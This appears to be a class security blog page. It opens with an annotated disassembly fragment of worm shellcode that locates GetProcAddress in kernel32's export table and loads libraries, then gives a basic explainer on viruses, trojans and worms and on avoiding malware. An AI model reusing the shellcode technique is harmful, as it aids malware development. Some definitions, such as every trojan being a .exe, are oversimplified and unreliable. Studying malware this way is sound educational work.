seg000:000003A8 0F 85 84 00 00 00 jnz TO_RVA_INNER_TOP ; didn't match, try the next one.
seg000:000003AE 8B 95 48 FE FF FF mov edx, [ebp-1B8h] ; it did match this is GetPRocAddr, need to get the mapped RVA for this func.
seg000:000003B4 03 95 48 FE FF FF add edx, [ebp-1B8h] ; get offset into table and double it
seg000:000003BA 03 95 58 FE FF FF add edx, [ebp-1A8h] ; get RVA Base for Kernel32.dll
seg000:000003C0 8B 85 54 FE FF FF mov eax, [ebp-1ACh]
seg000:000003C6 8B 48 24 mov ecx, [eax+24h]
seg000:000003C9 33 C0 xor eax, eax ; NULL out eax
seg000:000003CB 66 8B 04 0A mov ax, [edx+ecx]
seg000:000003CF 89 85 4C FE FF FF mov [ebp-1B4h], eax ; set ebp-1B4 to offset into rva table
seg000:000003D5 8B 8D 54 FE FF FF mov ecx, [ebp-1ACh]
seg000:000003DB 8B 51 10 mov edx, [ecx+10h]
seg000:000003DE 8B 85 4C FE FF FF mov eax, [ebp-1B4h]
seg000:000003E4 8D 4C 10 FF lea ecx, [eax+edx-1] ; Load Effective Address
seg000:000003E8 89 8D 4C FE FF FF mov [ebp-1B4h], ecx
seg000:000003EE 8B 95 4C FE FF FF mov edx, [ebp-1B4h]
seg000:000003F4 03 95 4C FE FF FF add edx, [ebp-1B4h] ; Add
seg000:000003FA 03 95 4C FE FF FF add edx, [ebp-1B4h] ; Add
seg000:00000400 03 95 4C FE FF FF add edx, [ebp-1B4h] ; Add
seg000:00000406 03 95 58 FE FF FF add edx, [ebp-1A8h] ; Add
seg000:0000040C 8B 85 54 FE FF FF mov eax, [ebp-1ACh]
seg000:00000412 8B 48 1C mov ecx, [eax+1Ch]
seg000:00000415 8B 14 0A mov edx, [edx+ecx]
seg000:00000418 89 95 4C FE FF FF mov [ebp-1B4h], edx
seg000:0000041E 8B 85 4C FE FF FF mov eax, [ebp-1B4h]
seg000:00000424 03 85 58 FE FF FF add eax, [ebp-1A8h] ; Add
seg000:0000042A 89 85 70 FE FF FF mov [ebp-190h], eax ; set ebp-190 to GetProcAddr Address
seg000:00000430 EB 05 jmp short TO_RVA_TOP ; Jump
seg000:00000432 ; ���������������������������������������������������������������������������
seg000:00000432
seg000:00000432 TO_RVA_INNER_TOP: ; CODE XREF: DO_RVA+168j
seg000:00000432 ; DO_RVA+184j
seg000:00000432 E9 0D FF FF FF jmp RVA_INNER_TOP ; this moves on to the next func in an rva table
seg000:00000437 ; ���������������������������������������������������������������������������
seg000:00000437
seg000:00000437 TO_RVA_TOP: ; CODE XREF: DO_RVA+73j
seg000:00000437 ; DO_RVA+94j ...
seg000:00000437 E9 16 FE FF FF jmp RVA_TOP ; this is null on the first loop through, due to a null set at init.
seg000:00000437 ; The purpose of this loop point is to loop through DLL Names in the RVA table, looking for KERNEL32.dll, or more specificly, KERN
seg000:0000043C ; ���������������������������������������������������������������������������
seg000:0000043C
seg000:0000043C GETPROC_LOADED: ; CODE XREF: DO_RVA+35j
seg000:0000043C 8D BD F0 FE FF FF lea edi, [ebp-110h] ; Load Effective Address
seg000:00000442 8B 47 08 mov eax, [edi+8]
seg000:00000445 64 A3 00 00 00 00 mov large fs:0, eax
seg000:0000044B 83 BD 70 FE FF FF+ cmp dword ptr [ebp-190h], 0 ; see if getprocaddr is loaded
seg000:00000452 75 05 jnz short GPLOADED2 ; if it is, goto gploaded2
seg000:00000454 E9 38 08 00 00 jmp TIGHT_LOOP ; else, goto locC91
seg000:00000459 ; ���������������������������������������������������������������������������
seg000:00000459
seg000:00000459 GPLOADED2: ; CODE XREF: DO_RVA+22Ej
seg000:00000459 C7 85 4C FE FF FF+ mov dword ptr [ebp-1B4h], 1 ; set ebp-1b4 to 1
seg000:00000463 EB 0F jmp short GETPROC_LOOP_TOP ; load edx with the data segment
seg000:00000465 ; ���������������������������������������������������������������������������
seg000:00000465
seg000:00000465 GETPROC_LOOP_INC: ; CODE XREF: DO_RVA+2E9j
seg000:00000465 8B 8D 4C FE FF FF mov ecx, [ebp-1B4h] ; increment the counter at ebp-ib4
seg000:0000046B 83 C1 01 add ecx, 1 ; Add
seg000:0000046E 89 8D 4C FE FF FF mov [ebp-1B4h], ecx
seg000:00000474
seg000:00000474 GETPROC_LOOP_TOP: ; CODE XREF: DO_RVA+23Fj
seg000:00000474 8B 95 68 FE FF FF mov edx, [ebp-198h] ; load edx with the data segment
seg000:0000047A 0F BE 02 movsx eax, byte ptr [edx] ; move the byte at data segment to eax
seg000:0000047D 85 C0 test eax, eax ; check if the byte is null. This signifies the end of the function data section.
seg000:0000047F 0F 84 8D 00 00 00 jz FUNC_LOAD_DONE ; if it is, go here
seg000:00000485 8B 8D 68 FE FF FF mov ecx, [ebp-198h] ; load ecx with the data segment
seg000:0000048B 0F BE 11 movsx edx, byte ptr [ecx] ; load edx wuith the byte at data segment
seg000:0000048E 83 FA 09 cmp edx, 9 ; check if the byte specifies change of dll
seg000:00000491 75 21 jnz short loc_4B4 ; if not, jump here
seg000:00000493 8B 85 68 FE FF FF mov eax, [ebp-198h] ; set eax to current data pointer
seg000:00000499 83 C0 01 add eax, 1 ; get past the 9
seg000:0000049C 8B F4 mov esi, esp
seg000:0000049E 50 push eax ; push current data pointer
seg000:0000049F FF 95 90 FE FF FF call dword ptr [ebp-170h] ; LoadLibraryA
seg000:000004A5 3B F4 cmp esi, esp ; Compare Two Operands
seg000:000004A7 90 nop ; No Operation
seg000:000004A8 43 inc ebx ; Increment by 1
seg000:000004A9 4B dec ebx ; Decrement by 1

Note that this is not the entire worm, only a portion of it. Other examples can be found here.




what is the difference between a virus, trojan, and worm?

A virus is a self replicating program that is intended to harm as many files as possible. It requires an external mode of transportation (as an email attachment or embedded in a file) in order to spread. It also requires some user action to deploy, such as opening said file or attachment.

A worm is a self replicating file, usually designed to steal data, though it can also damage systems as well. Because worms are able to transmit themselves over a network, they have the DDoS attack vector as well.

A trojan is a .exe file that hides itself on your computer. It can damage system files, but is more likely to open a back door for other malware and spyware to infect your system. The goal of a trojan infection is usually some form of monetary or intelligence gain that will last over an extended period of time. Trojans are harder to spread because they must be contained within an executable file. However, joiner programs join a trojan with a legitimate files as noted above.


How can malware be avoided?

Malware depends on two factors to penetrate networks. The first is weak security. Lack of anti-virus software, firewalls, etc. The second, and most important, is user ignorance.

most all malware can be avoided by intelligent browsing and staying away from the fringes of the internet (Porn, warez, hack, and other underground websites). A good anti-virus program and a router with built in firewall will protect the average user well enough.

Large corporations, however, are targets of continued and increasingly complex attacks. Security within these corporations is usually layered, with dedicated proxy servers and special hardware firewalls integrated into the network.

There is no ultimate defense against malware, because information must enter and leave a network in order for said network to be useful. Anti-virus programs must be written to look for specific patterns within a file to determine if it is infected. Because a malware agent can be written in any one of a million different ways, new programs can go undetected by even the most up-to-date anti-virus software.

Viruses

First entry (blog page updated)

I have updated my blog page to include some useful links. Some are specifically for network and information security updates, others are for recreation or general knowledge. I will attempt to produce further websites that will be of use in the class.